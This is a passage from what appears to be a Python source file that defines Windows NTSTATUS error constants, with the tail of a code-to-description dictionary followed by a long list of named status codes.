("STATUS_IPSEC_DOSP_MAX_ENTRIES","IPsec Dos Protection failed to create state because there are already maximum number of entries allowed by policy."), 0xC0368005: ("STATUS_IPSEC_DOSP_KEYMOD_NOT_ALLOWED","IPsec Dos Protection received an IPsec negotiation packet for a keying module which is not allowed by policy."), 0xC0368006: ("STATUS_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES","IPsec Dos Protection failed to create per internal IP ratelimit queue because there is already maximum number of queues allowed by policy."), 0xC038005B: ("STATUS_VOLMGR_MIRROR_NOT_SUPPORTED","The system does not support mirrored volumes."), 0xC038005C: ("STATUS_VOLMGR_RAID5_NOT_SUPPORTED","The system does not support RAID-5 volumes."), 0xC03A0014: ("STATUS_VIRTDISK_PROVIDER_NOT_FOUND","A virtual disk support provider for the specified file was not found."), 0xC03A0015: ("STATUS_VIRTDISK_NOT_VIRTUAL_DISK","The specified disk is not a virtual disk."), 0xC03A0016: ("STATUS_VHD_PARENT_VHD_ACCESS_DENIED","The chain of virtual hard disks is inaccessible. The process has not been granted access rights to the parent virtual hard disk for the differencing disk."), 0xC03A0017: ("STATUS_VHD_CHILD_PARENT_SIZE_MISMATCH","The chain of virtual hard disks is corrupted. There is a mismatch in the virtual sizes of the parent virtual hard disk and differencing disk."), 0xC03A0018: ("STATUS_VHD_DIFFERENCING_CHAIN_CYCLE_DETECTED","The chain of virtual hard disks is corrupted. A differencing disk is indicated in its own parent chain."), 0xC03A0019: ("STATUS_VHD_DIFFERENCING_CHAIN_ERROR_IN_PARENT","The chain of virtual hard disks is inaccessible. There was an error opening a virtual hard disk further up the chain."), } # Error Codes STATUS_SUCCESS = 0x00000000 STATUS_WAIT_1 = 0x00000001 STATUS_WAIT_2 = 0x00000002 STATUS_WAIT_3 = 0x00000003 STATUS_WAIT_63 = 0x0000003F STATUS_ABANDONED = 0x00000080 STATUS_ABANDONED_WAIT_0 = 0x00000080 STATUS_ABANDONED_WAIT_63 = 0x000000BF STATUS_USER_APC = 0x000000C0 STATUS_ALERTED = 0x00000101 STATUS_TIMEOUT = 0x00000102 STATUS_PENDING = 0x00000103 STATUS_REPARSE = 0x00000104 STATUS_MORE_ENTRIES = 0x00000105 STATUS_NOT_ALL_ASSIGNED = 0x00000106 STATUS_SOME_NOT_MAPPED = 0x00000107 STATUS_OPLOCK_BREAK_IN_PROGRESS = 0x00000108 STATUS_VOLUME_MOUNTED = 0x00000109 STATUS_RXACT_COMMITTED = 0x0000010A STATUS_NOTIFY_CLEANUP = 0x0000010B STATUS_NOTIFY_ENUM_DIR = 0x0000010C STATUS_NO_QUOTAS_FOR_ACCOUNT = 0x0000010D STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x0000010E STATUS_PAGE_FAULT_TRANSITION = 0x00000110 STATUS_PAGE_FAULT_DEMAND_ZERO = 0x00000111 STATUS_PAGE_FAULT_COPY_ON_WRITE = 0x00000112 STATUS_PAGE_FAULT_GUARD_PAGE = 0x00000113 STATUS_PAGE_FAULT_PAGING_FILE = 0x00000114 STATUS_CACHE_PAGE_LOCKED = 0x00000115 STATUS_CRASH_DUMP = 0x00000116 STATUS_BUFFER_ALL_ZEROS = 0x00000117 STATUS_REPARSE_OBJECT = 0x00000118 STATUS_RESOURCE_REQUIREMENTS_CHANGED = 0x00000119 STATUS_TRANSLATION_COMPLETE = 0x00000120 STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x00000121 STATUS_NOTHING_TO_TERMINATE = 0x00000122 STATUS_PROCESS_NOT_IN_JOB = 0x00000123 STATUS_PROCESS_IN_JOB = 0x00000124 STATUS_VOLSNAP_HIBERNATE_READY = 0x00000125 STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x00000126 STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x00000127 STATUS_INTERRUPT_STILL_CONNECTED = 0x00000128 STATUS_PROCESS_CLONED = 0x00000129 STATUS_FILE_LOCKED_WITH_ONLY_READERS = 0x0000012A STATUS_FILE_LOCKED_WITH_WRITERS = 0x0000012B STATUS_RESOURCEMANAGER_READ_ONLY = 0x00000202 STATUS_WAIT_FOR_OPLOCK = 0x00000367 DBG_EXCEPTION_HANDLED = 0x00010001 DBG_CONTINUE = 0x00010002 STATUS_FLT_IO_COMPLETE = 0x001C0001 STATUS_FILE_NOT_AVAILABLE = 0xC0000467 STATUS_CALLBACK_RETURNED_THREAD_AFFINITY = 0xC0000721 STATUS_OBJECT_NAME_EXISTS = 0x40000000 STATUS_THREAD_WAS_SUSPENDED = 0x40000001 STATUS_WORKING_SET_LIMIT_RANGE = 0x40000002 STATUS_IMAGE_NOT_AT_BASE = 0x40000003 STATUS_RXACT_STATE_CREATED = 0x40000004 STATUS_SEGMENT_NOTIFICATION = 0x40000005 STATUS_LOCAL_USER_SESSION_KEY = 0x40000006 STATUS_BAD_CURRENT_DIRECTORY = 0x40000007 STATUS_SERIAL_MORE_WRITES = 0x40000008 STATUS_REGISTRY_RECOVERED = 0x40000009 STATUS_FT_READ_RECOVERY_FROM_BACKUP = 0x4000000A STATUS_FT_WRITE_RECOVERY = 0x4000000B STATUS_SERIAL_COUNTER_TIMEOUT = 0x4000000C STATUS_NULL_LM_PASSWORD = 0x4000000D STATUS_IMAGE_MACHINE_TYPE_MISMATCH = 0x4000000E STATUS_RECEIVE_PARTIAL = 0x4000000F STATUS_RECEIVE_EXPEDITED = 0x40000010 STATUS_RECEIVE_PARTIAL_EXPEDITED = 0x40000011 STATUS_EVENT_DONE = 0x40000012 STATUS_EVENT_PENDING = 0x40000013 STATUS_CHECKING_FILE_SYSTEM = 0x40000014 STATUS_FATAL_APP_EXIT = 0x40000015 STATUS_PREDEFINED_HANDLE = 0x40000016 STATUS_WAS_UNLOCKED = 0x40000017 STATUS_SERVICE_NOTIFICATION = 0x40000018 STATUS_WAS_LOCKED = 0x40000019 STATUS_LOG_HARD_ERROR = 0x4000001A STATUS_ALREADY_WIN32 = 0x4000001B STATUS_WX86_UNSIMULATE = 0x4000001C STATUS_WX86_CONTINUE = 0x4000001D STATUS_WX86_SINGLE_STEP = 0x4000001E STATUS_WX86_BREAKPOINT = 0x4000001F STATUS_WX86_EXCEPTION_CONTINUE = 0x40000020 STATUS_WX86_EXCEPTION_LASTCHANCE = 0x40000021 STATUS_WX86_EXCEPTION_CHAIN = 0x40000022 STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x40000023 STATUS_NO_YIELD_PERFORMED = 0x40000024 STATUS_TIMER_RESUME_IGNORED = 0x40000025 STATUS_ARBITRATION_UNHANDLED = 0x40000026 STATUS_CARDBUS_NOT_SUPPORTED = 0x40000027 STATUS_WX86_CREATEWX86TIB = 0x40000028 STATUS_MP_PROCESSOR_MISMATCH = 0x40000029 STATUS_HIBERNATED = 0x4000002A STATUS_RESUME_HIBERNATION = 0x4000002B STATUS_FIRMWARE_UPDATED = 0x4000002C STATUS_DRIVERS_LEAKING_LOCKED_PAGES = 0x4000002D STATUS_MESSAGE_RETRIEVED = 0x4000002E STATUS_SYSTEM_POWERSTATE_TRANSITION = 0x4000002F STATUS_ALPC_CHECK_COMPLETION_LIST = 0x40000030 STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x40000031 STATUS_ACCESS_AUDIT_BY_POLICY = 0x40000032 STATUS_ABANDON_HIBERFILE = 0x40000033 STATUS_BIZRULES_NOT_ENABLED = 0x40000034 STATUS_WAKE_SYSTEM = 0x40000294 STATUS_DS_SHUTTING_DOWN = 0x40000370 DBG_REPLY_LATER = 0x40010001 DBG_UNABLE_TO_PROVIDE_HANDLE = 0x40010002 DBG_TERMINATE_THREAD = 0x40010003 DBG_TERMINATE_PROCESS = 0x40010004 DBG_CONTROL_C = 0x40010005 DBG_PRINTEXCEPTION_C = 0x40010006 DBG_RIPEXCEPTION = 0x40010007 DBG_CONTROL_BREAK = 0x40010008 DBG_COMMAND_EXCEPTION = 0x40010009 RPC_NT_UUID_LOCAL_ONLY = 0x40020056 RPC_NT_SEND_INCOMPLETE = 0x400200AF STATUS_CTX_CDM_CONNECT = 0x400A0004 STATUS_CTX_CDM_DISCONNECT = 0x400A0005 STATUS_SXS_RELEASE_ACTIVATION_CONTEXT = 0x4015000D STATUS_RECOVERY_NOT_NEEDED = 0x40190034 STATUS_RM_ALREADY_STARTED = 0x40190035 STATUS_LOG_NO_RESTART = 0x401A000C STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST = 0x401B00EC STATUS_GRAPHICS_PARTIAL_DATA_POPULATED = 0x401E000A STATUS_GRAPHICS_DRIVER_MISMATCH = 0x401E0117 STATUS_GRAPHICS_MODE_NOT_PINNED = 0x401E0307 STATUS_GRAPHICS_NO_PREFERRED_MODE = 0x401E031E STATUS_GRAPHICS_DATASET_IS_EMPTY = 0x401E034B STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET = 0x401E034C STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED = 0x401E0351 STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS = 0x401E042F STATUS_GRAPHICS_LEADLINK_START_DEFERRED = 0x401E0437 STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY = 0x401E0439 STATUS_GRAPHICS_START_DEFERRED = 0x401E043A STATUS_NDIS_INDICATION_REQUIRED = 0x40230001 STATUS_GUARD_PAGE_VIOLATION = 0x80000001 STATUS_DATATYPE_MISALIGNMENT = 0x80000002 STATUS_BREAKPOINT = 0x80000003 STATUS_SINGLE_STEP = 0x80000004 STATUS_BUFFER_OVERFLOW = 0x80000005 STATUS_NO_MORE_FILES = 0x80000006 STATUS_WAKE_SYSTEM_DEBUGGER = 0x80000007 STATUS_HANDLES_CLOSED = 0x8000000A STATUS_NO_INHERITANCE = 0x8000000B STATUS_GUID_SUBSTITUTION_MADE = 0x8000000C STATUS_PARTIAL_COPY = 0x8000000D STATUS_DEVICE_PAPER_EMPTY = 0x8000000E STATUS_DEVICE_POWERED_OFF = 0x8000000F STATUS_DEVICE_OFF_LINE = 0x80000010 STATUS_DEVICE_BUSY = 0x80000011 STATUS_NO_MORE_EAS = 0x80000012 STATUS_INVALID_EA_NAME = 0x80000013 STATUS_EA_LIST_INCONSISTENT = 0x80000014 STATUS_INVALID_EA_FLAG = 0x80000015 STATUS_VERIFY_REQUIRED = 0x80000016 STATUS_EXTRANEOUS_INFORMATION = 0x80000017 STATUS_RXACT_COMMIT_NECESSARY = 0x80000018 STATUS_NO_MORE_ENTRIES = 0x8000001A STATUS_FILEMARK_DETECTED = 0x8000001B STATUS_MEDIA_CHANGED = 0x8000001C STATUS_BUS_RESET = 0x8000001D STATUS_END_OF_MEDIA = 0x8000001E STATUS_BEGINNING_OF_MEDIA = 0x8000001F STATUS_MEDIA_CHECK = 0x80000020 STATUS_SETMARK_DETECTED = 0x80000021 STATUS_NO_DATA_DETECTED = 0x80000022 STATUS_REDIRECTOR_HAS_OPEN_HANDLES = 0x80000023 STATUS_SERVER_HAS_OPEN_HANDLES = 0x80000024 STATUS_ALREADY_DISCONNECTED = 0x80000025 STATUS_LONGJUMP = 0x80000026 STATUS_CLEANER_CARTRIDGE_INSTALLED = 0x80000027 STATUS_PLUGPLAY_QUERY_VETOED = 0x80000028 STATUS_UNWIND_CONSOLIDATE = 0x80000029 STATUS_REGISTRY_HIVE_RECOVERED = 0x8000002A STATUS_DLL_MIGHT_BE_INSECURE = 0x8000002B STATUS_DLL_MIGHT_BE_INCOMPATIBLE = 0x8000002C STATUS_STOPPED_ON_SYMLINK = 0x8000002D STATUS_DEVICE_REQUIRES_CLEANING = 0x80000288 STATUS_DEVICE_DOOR_OPEN = 0x80000289 STATUS_DATA_LOST_REPAIR = 0x80000803 DBG_EXCEPTION_NOT_HANDLED = 0x80010001 STATUS_CLUSTER_NODE_ALREADY_UP = 0x80130001 STATUS_CLUSTER_NODE_ALREADY_DOWN = 0x80130002 STATUS_CLUSTER_NETWORK_ALREADY_ONLINE = 0x80130003 STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x80130004 STATUS_CLUSTER_NODE_ALREADY_MEMBER = 0x80130005 STATUS_COULD_NOT_RESIZE_LOG = 0x80190009 STATUS_NO_TXF_METADATA = 0x80190029 STATUS_CANT_RECOVER_WITH_HANDLE_OPEN = 0x80190031 STATUS_TXF_METADATA_ALREADY_PRESENT = 0x80190041 STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x80190042 STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED = 0x801B00EB STATUS_FLT_BUFFER_TOO_SMALL = 0x801C0001 STATUS_FVE_PARTIAL_METADATA = 0x80210001 STATUS_FVE_TRANSIENT_STATE = 0x80210002 STATUS_UNSUCCESSFUL = 0xC0000001 STATUS_NOT_IMPLEMENTED = 0xC0000002 STATUS_INVALID_INFO_CLASS = 0xC0000003 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_ACCESS_VIOLATION = 0xC0000005 STATUS_IN_PAGE_ERROR = 0xC0000006 STATUS_PAGEFILE_QUOTA = 0xC0000007 STATUS_INVALID_HANDLE = 0xC0000008 STATUS_BAD_INITIAL_STACK = 0xC0000009 STATUS_BAD_INITIAL_PC = 0xC000000A STATUS_INVALID_CID = 0xC000000B STATUS_TIMER_NOT_CANCELED = 0xC000000C STATUS_INVALID_PARAMETER = 0xC000000D STATUS_NO_SUCH_DEVICE = 0xC000000E STATUS_NO_SUCH_FILE = 0xC000000F STATUS_INVALID_DEVICE_REQUEST = 0xC0000010 STATUS_END_OF_FILE = 0xC0000011 STATUS_WRONG_VOLUME = 0xC0000012 STATUS_NO_MEDIA_IN_DEVICE = 0xC0000013 STATUS_UNRECOGNIZED_MEDIA = 0xC0000014 STATUS_NONEXISTENT_SECTOR = 0xC0000015 STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 STATUS_NO_MEMORY = 0xC0000017 STATUS_CONFLICTING_ADDRESSES = 0xC0000018 STATUS_NOT_MAPPED_VIEW = 0xC0000019 STATUS_UNABLE_TO_FREE_VM = 0xC000001A STATUS_UNABLE_TO_DELETE_SECTION = 0xC000001B STATUS_INVALID_SYSTEM_SERVICE = 0xC000001C STATUS_ILLEGAL_INSTRUCTION = 0xC000001D STATUS_INVALID_LOCK_SEQUENCE = 0xC000001E STATUS_INVALID_VIEW_SIZE = 0xC000001F STATUS_INVALID_FILE_FOR_SECTION = 0xC0000020 STATUS_ALREADY_COMMITTED = 0xC0000021 STATUS_ACCESS_DENIED = 0xC0000022 STATUS_BUFFER_TOO_SMALL = 0xC0000023 STATUS_OBJECT_TYPE_MISMATCH = 0xC0000024 STATUS_NONCONTINUABLE_EXCEPTION = 0xC0000025 STATUS_INVALID_DISPOSITION = 0xC0000026 STATUS_UNWIND = 0xC0000027 STATUS_BAD_STACK = 0xC0000028 STATUS_INVALID_UNWIND_TARGET = 0xC0000029 STATUS_NOT_LOCKED = 0xC000002A STATUS_PARITY_ERROR = 0xC000002B STATUS_UNABLE_TO_DECOMMIT_VM = 0xC000002C STATUS_NOT_COMMITTED = 0xC000002D STATUS_INVALID_PORT_ATTRIBUTES = 0xC000002E STATUS_PORT_MESSAGE_TOO_LONG = 0xC000002F STATUS_INVALID_PARAMETER_MIX = 0xC0000030 STATUS_INVALID_QUOTA_LOWER = 0xC0000031 STATUS_DISK_CORRUPT_ERROR = 0xC0000032 STATUS_OBJECT_NAME_INVALID = 0xC0000033 STATUS_OBJECT_NAME_NOT_FOUND = 0xC0000034 STATUS_OBJECT_NAME_COLLISION = 0xC0000035 STATUS_PORT_DISCONNECTED = 0xC0000037 STATUS_DEVICE_ALREADY_ATTACHED = 0xC0000038 STATUS_OBJECT_PATH_INVALID = 0xC0000039 STATUS_OBJECT_PATH_NOT_FOUND = 0xC000003A STATUS_OBJECT_PATH_SYNTAX_BAD = 0xC000003B STATUS_DATA_OVERRUN = 0xC000003C STATUS_DATA_LATE_ERROR = 0xC000003D STATUS_DATA_ERROR = 0xC000003E STATUS_CRC_ERROR = 0xC000003F STATUS_SECTION_TOO_BIG = 0xC0000040 STATUS_PORT_CONNECTION_REFUSED = 0xC0000041 STATUS_INVALID_PORT_HANDLE = 0xC0000042 STATUS_SHARING_VIOLATION = 0xC0000043 STATUS_QUOTA_EXCEEDED = 0xC0000044 STATUS_INVALID_PAGE_PROTECTION = 0xC0000045 STATUS_MUTANT_NOT_OWNED = 0xC0000046 STATUS_SEMAPHORE_LIMIT_EXCEEDED = 0xC0000047 STATUS_PORT_ALREADY_SET = 0xC0000048 STATUS_SECTION_NOT_IMAGE = 0xC0000049 STATUS_SUSPEND_COUNT_EXCEEDED = 0xC000004A STATUS_THREAD_IS_TERMINATING = 0xC000004B STATUS_BAD_WORKING_SET_LIMIT = 0xC000004C STATUS_INCOMPATIBLE_FILE_MAP = 0xC000004D STATUS_SECTION_PROTECTION = 0xC000004E STATUS_EAS_NOT_SUPPORTED = 0xC000004F STATUS_EA_TOO_LARGE = 0xC0000050 STATUS_NONEXISTENT_EA_ENTRY = 0xC0000051 STATUS_NO_EAS_ON_FILE = 0xC0000052 STATUS_EA_CORRUPT_ERROR = 0xC0000053 STATUS_FILE_LOCK_CONFLICT = 0xC0000054 STATUS_LOCK_NOT_GRANTED = 0xC0000055 STATUS_DELETE_PENDING = 0xC0000056 STATUS_CTL_FILE_NOT_SUPPORTED = 0xC0000057 STATUS_UNKNOWN_REVISION = 0xC0000058 STATUS_REVISION_MISMATCH = 0xC0000059 STATUS_INVALID_OWNER = 0xC000005A STATUS_INVALID_PRIMARY_GROUP = 0xC000005B STATUS_NO_IMPERSONATION_TOKEN = 0xC000005C STATUS_CANT_DISABLE_MANDATORY = 0xC000005D STATUS_NO_LOGON_SERVERS = 0xC000005E STATUS_NO_SUCH_LOGON_SESSION = 0xC000005F STATUS_NO_SUCH_PRIVILEGE = 0xC0000060 STATUS_PRIVILEGE_NOT_HELD = 0xC0000061 STATUS_INVALID_ACCOUNT_NAME = 0xC0000062 STATUS_USER_EXISTS = 0xC0000063 STATUS_NO_SUCH_USER = 0xC0000064 STATUS_GROUP_EXISTS = 0xC0000065 STATUS_NO_SUCH_GROUP = 0xC0000066 STATUS_MEMBER_IN_GROUP = 0xC0000067 STATUS_MEMBER_NOT_IN_GROUP = 0xC0000068 STATUS_LAST_ADMIN = 0xC0000069 STATUS_WRONG_PASSWORD = 0xC000006A STATUS_ILL_FORMED_PASSWORD = 0xC000006B STATUS_PASSWORD_RESTRICTION = 0xC000006C STATUS_LOGON_FAILURE = 0xC000006D STATUS_ACCOUNT_RESTRICTION = 0xC000006E STATUS_INVALID_LOGON_HOURS = 0xC000006F STATUS_INVALID_WORKSTATION = 0xC0000070 STATUS_PASSWORD_EXPIRED = 0xC0000071 STATUS_ACCOUNT_DISABLED = 0xC0000072 STATUS_NONE_MAPPED = 0xC0000073 STATUS_TOO_MANY_LUIDS_REQUESTED = 0xC0000074 STATUS_LUIDS_EXHAUSTED = 0xC0000075 STATUS_INVALID_SUB_AUTHORITY = 0xC0000076 STATUS_INVALID_ACL = 0xC0000077 STATUS_INVALID_SID = 0xC0000078 STATUS_INVALID_SECURITY_DESCR = 0xC0000079 STATUS_PROCEDURE_NOT_FOUND = 0xC000007A STATUS_INVALID_IMAGE_FORMAT = 0xC000007B STATUS_NO_TOKEN = 0xC000007C STATUS_BAD_INHERITANCE_ACL = 0xC000007D STATUS_RANGE_NOT_LOCKED = 0xC000007E STATUS_DISK_FULL = 0xC000007F STATUS_SERVER_DISABLED = 0xC0000080 STATUS_SERVER_NOT_DISABLED = 0xC0000081 STATUS_TOO_MANY_GUIDS_REQUESTED = 0xC0000082 STATUS_GUIDS_EXHAUSTED = 0xC0000083 STATUS_INVALID_ID_AUTHORITY = 0xC0000084 STATUS_AGENTS_EXHAUSTED = 0xC0000085 STATUS_INVALID_VOLUME_LABEL = 0xC0000086 STATUS_SECTION_NOT_EXTENDED = 0xC0000087 STATUS_NOT_MAPPED_DATA = 0xC0000088 STATUS_RESOURCE_DATA_NOT_FOUND = 0xC0000089 STATUS_RESOURCE_TYPE_NOT_FOUND = 0xC000008A STATUS_RESOURCE_NAME_NOT_FOUND = 0xC000008B STATUS_ARRAY_BOUNDS_EXCEEDED = 0xC000008C STATUS_FLOAT_DENORMAL_OPERAND = 0xC000008D STATUS_FLOAT_DIVIDE_BY_ZERO = 0xC000008E STATUS_FLOAT_INEXACT_RESULT = 0xC000008F STATUS_FLOAT_INVALID_OPERATION = 0xC0000090 STATUS_FLOAT_OVERFLOW = 0xC0000091 STATUS_FLOAT_STACK_CHECK = 0xC0000092 STATUS_FLOAT_UNDERFLOW = 0xC0000093 STATUS_INTEGER_DIVIDE_BY_ZERO = 0xC0000094 STATUS_INTEGER_OVERFLOW = 0xC0000095 STATUS_PRIVILEGED_INSTRUCTION = 0xC0000096 STATUS_TOO_MANY_PAGING_FILES = 0xC0000097 STATUS_FILE_INVALID = 0xC0000098 STATUS_ALLOTTED_SPACE_EXCEEDED = 0xC0000099 STATUS_INSUFFICIENT_RESOURCES = 0xC000009A STATUS_DFS_EXIT_PATH_FOUND = 0xC000009B STATUS_DEVICE_DATA_ERROR = 0xC000009C STATUS_DEVICE_NOT_CONNECTED = 0xC000009D STATUS_FREE_VM_NOT_AT_BASE = 0xC000009F STATUS_MEMORY_NOT_ALLOCATED = 0xC00000A0 STATUS_WORKING_SET_QUOTA = 0xC00000A1 STATUS_MEDIA_WRITE_PROTECTED = 0xC00000A2 STATUS_DEVICE_NOT_READY = 0xC00000A3 STATUS_INVALID_GROUP_ATTRIBUTES = 0xC00000A4 STATUS_BAD_IMPERSONATION_LEVEL = 0xC00000A5 STATUS_CANT_OPEN_ANONYMOUS = 0xC00000A6 STATUS_BAD_VALIDATION_CLASS = 0xC00000A7 STATUS_BAD_TOKEN_TYPE = 0xC00000A8 STATUS_BAD_MASTER_BOOT_RECORD = 0xC00000A9 STATUS_INSTRUCTION_MISALIGNMENT = 0xC00000AA STATUS_INSTANCE_NOT_AVAILABLE = 0xC00000AB STATUS_PIPE_NOT_AVAILABLE = 0xC00000AC STATUS_INVALID_PIPE_STATE = 0xC00000AD STATUS_PIPE_BUSY = 0xC00000AE STATUS_ILLEGAL_FUNCTION = 0xC00000AF STATUS_PIPE_DISCONNECTED = 0xC00000B0 STATUS_PIPE_CLOSING = 0xC00000B1 STATUS_PIPE_CONNECTED = 0xC00000B2 STATUS_PIPE_LISTENING = 0xC00000B3 STATUS_INVALID_READ_MODE = 0xC00000B4 STATUS_IO_TIMEOUT = 0xC00000B5 STATUS_FILE_FORCED_CLOSED = 0xC00000B6 STATUS_PROFILING_NOT_STARTED = 0xC00000B7 STATUS_PROFILING_NOT_STOPPED = 0xC00000B8 STATUS_COULD_NOT_INTERPRET = 0xC00000B9 STATUS_FILE_IS_A_DIRECTORY = 0xC00000BA STATUS_NOT_SUPPORTED = 0xC00000BB STATUS_REMOTE_NOT_LISTENING = 0xC00000BC STATUS_DUPLICATE_NAME = 0xC00000BD STATUS_BAD_NETWORK_PATH = 0xC00000BE STATUS_NETWORK_BUSY = 0xC00000BF STATUS_DEVICE_DOES_NOT_EXIST = 0xC00000C0 STATUS_TOO_MANY_COMMANDS = 0xC00000C1 STATUS_ADAPTER_HARDWARE_ERROR = 0xC00000C2 STATUS_INVALID_NETWORK_RESPONSE = 0xC00000C3 STATUS_UNEXPECTED_NETWORK_ERROR = 0xC00000C4 STATUS_BAD_REMOTE_ADAPTER = 0xC00000C5 STATUS_PRINT_QUEUE_FULL = 0xC00000C6 STATUS_NO_SPOOL_SPACE = 0xC00000C7 STATUS_PRINT_CANCELLED = 0xC00000C8 STATUS_NETWORK_NAME_DELETED = 0xC00000C9 STATUS_NETWORK_ACCESS_DENIED = 0xC00000CA STATUS_BAD_DEVICE_TYPE = 0xC00000CB STATUS_BAD_NETWORK_NAME = 0xC00000CC STATUS_TOO_MANY_NAMES = 0xC00000CD STATUS_TOO_MANY_SESSIONS = 0xC00000CE STATUS_SHARING_PAUSED = 0xC00000CF STATUS_REQUEST_NOT_ACCEPTED = 0xC00000D0 STATUS_REDIRECTOR_PAUSED = 0xC00000D1 STATUS_NET_WRITE_FAULT = 0xC00000D2 STATUS_PROFILING_AT_LIMIT = 0xC00000D3 STATUS_NOT_SAME_DEVICE = 0xC00000D4 STATUS_FILE_RENAMED = 0xC00000D5 STATUS_VIRTUAL_CIRCUIT_CLOSED = 0xC00000D6 STATUS_NO_SECURITY_ON_OBJECT = 0xC00000D7 STATUS_CANT_WAIT = 0xC00000D8 STATUS_PIPE_EMPTY = 0xC00000D9 STATUS_CANT_ACCESS_DOMAIN_INFO = 0xC00000DA STATUS_CANT_TERMINATE_SELF = 0xC00000DB STATUS_INVALID_SERVER_STATE = 0xC00000DC STATUS_INVALID_DOMAIN_STATE = 0xC00000DD STATUS_INVALID_DOMAIN_ROLE = 0xC00000DE STATUS_NO_SUCH_DOMAIN = 0xC00000DF STATUS_DOMAIN_EXISTS = 0xC00000E0 STATUS_DOMAIN_LIMIT_EXCEEDED = 0xC00000E1 STATUS_OPLOCK_NOT_GRANTED = 0xC00000E2 STATUS_INVALID_OPLOCK_PROTOCOL = 0xC00000E3 STATUS_INTERNAL_DB_CORRUPTION = 0xC00000E4 STATUS_INTERNAL_ERROR = 0xC00000E5 STATUS_GENERIC_NOT_MAPPED = 0xC00000E6 STATUS_BAD_DESCRIPTOR_FORMAT = 0xC00000E7 STATUS_INVALID_USER_BUFFER = 0xC00000E8 STATUS_UNEXPECTED_IO_ERROR = 0xC00000E9 STATUS_UNEXPECTED_MM_CREATE_ERR = 0xC00000EA STATUS_UNEXPECTED_MM_MAP_ERROR = 0xC00000EB STATUS_UNEXPECTED_MM_EXTEND_ERR = 0xC00000EC STATUS_NOT_LOGON_PROCESS = 0xC00000ED STATUS_LOGON_SESSION_EXISTS = 0xC00000EE STATUS_INVALID_PARAMETER_1 = 0xC00000EF STATUS_INVALID_PARAMETER_2 = 0xC00000F0 STATUS_INVALID_PARAMETER_3 = 0xC00000F1 STATUS_INVALID_PARAMETER_4 = 0xC00000F2 STATUS_INVALID_PARAMETER_5 = 0xC00000F3 STATUS_INVALID_PARAMETER_6 = 0xC00000F4 STATUS_INVALID_PARAMETER_7 = 0xC00000F5 STATUS_INVALID_PARAMETER_8 = 0xC00000F6 STATUS_INVALID_PARAMETER_9 = 0xC00000F7 STATUS_INVALID_PARAMETER_10 = 0xC00000F8 STATUS_INVALID_PARAMETER_11 = 0xC00000F9 STATUS_INVALID_PARAMETER_12 = 0xC00000FA STATUS_REDIRECTOR_NOT_STARTED = 0xC00000FB STATUS_REDIRECTOR_STARTED = 0xC00000FC STATUS_STACK_OVERFLOW = 0xC00000FD STATUS_NO_SUCH_PACKAGE = 0xC00000FE STATUS_BAD_FUNCTION_TABLE = 0xC00000FF STATUS_VARIABLE_NOT_FOUND = 0xC0000100 STATUS_DIRECTORY_NOT_EMPTY = 0xC0000101 STATUS_FILE_CORRUPT_ERROR = 0xC0000102 STATUS_NOT_A_DIRECTORY = 0xC0000103 STATUS_BAD_LOGON_SESSION_STATE = 0xC0000104 STATUS_LOGON_SESSION_COLLISION = 0xC0000105 STATUS_NAME_TOO_LONG = 0xC0000106 STATUS_FILES_OPEN = 0xC0000107 STATUS_CONNECTION_IN_USE = 0xC0000108 STATUS_MESSAGE_NOT_FOUND = 0xC0000109 STATUS_PROCESS_IS_TERMINATING = 0xC000010A STATUS_INVALID_LOGON_TYPE = 0xC000010B STATUS_NO_GUID_TRANSLATION = 0xC000010C STATUS_CANNOT_IMPERSONATE = 0xC000010D STATUS_IMAGE_ALREADY_LOADED = 0xC000010E STATUS_NO_LDT = 0xC0000117 STATUS_INVALID_LDT_SIZE = 0xC0000118 STATUS_INVALID_LDT_OFFSET = 0xC0000119 STATUS_INVALID_LDT_DESCRIPTOR = 0xC000011A STATUS_INVALID_IMAGE_NE_FORMAT = 0xC000011B STATUS_RXACT_INVALID_STATE = 0xC000011C STATUS_RXACT_COMMIT_FAILURE = 0xC000011D STATUS_MAPPED_FILE_SIZE_ZERO = 0xC000011E STATUS_TOO_MANY_OPENED_FILES = 0xC000011F STATUS_CANCELLED = 0xC0000120 STATUS_CANNOT_DELETE = 0xC0000121 STATUS_INVALID_COMPUTER_NAME = 0xC0000122 STATUS_FILE_DELETED = 0xC0000123 STATUS_SPECIAL_ACCOUNT = 0xC0000124 STATUS_SPECIAL_GROUP = 0xC0000125 STATUS_SPECIAL_USER = 0xC0000126 STATUS_MEMBERS_PRIMARY_GROUP = 0xC0000127 STATUS_FILE_CLOSED = 0xC0000128 STATUS_TOO_MANY_THREADS = 0xC0000129 STATUS_THREAD_NOT_IN_PROCESS = 0xC000012A STATUS_TOKEN_ALREADY_IN_USE = 0xC000012B STATUS_PAGEFILE_QUOTA_EXCEEDED = 0xC000012C STATUS_COMMITMENT_LIMIT = 0xC000012D STATUS_INVALID_IMAGE_LE_FORMAT = 0xC000012E STATUS_INVALID_IMAGE_NOT_MZ = 0xC000012F STATUS_INVALID_IMAGE_PROTECT = 0xC0000130 STATUS_INVALID_IMAGE_WIN_16 = 0xC0000131 STATUS_LOGON_SERVER_CONFLICT = 0xC0000132 STATUS_TIME_DIFFERENCE_AT_DC = 0xC0000133 STATUS_SYNCHRONIZATION_REQUIRED = 0xC0000134 STATUS_DLL_NOT_FOUND = 0xC0000135 STATUS_OPEN_FAILED = 0xC0000136 STATUS_IO_PRIVILEGE_FAILED = 0xC0000137 STATUS_ORDINAL_NOT_FOUND = 0xC0000138 STATUS_ENTRYPOINT_NOT_FOUND = 0xC0000139 STATUS_CONTROL_C_EXIT = 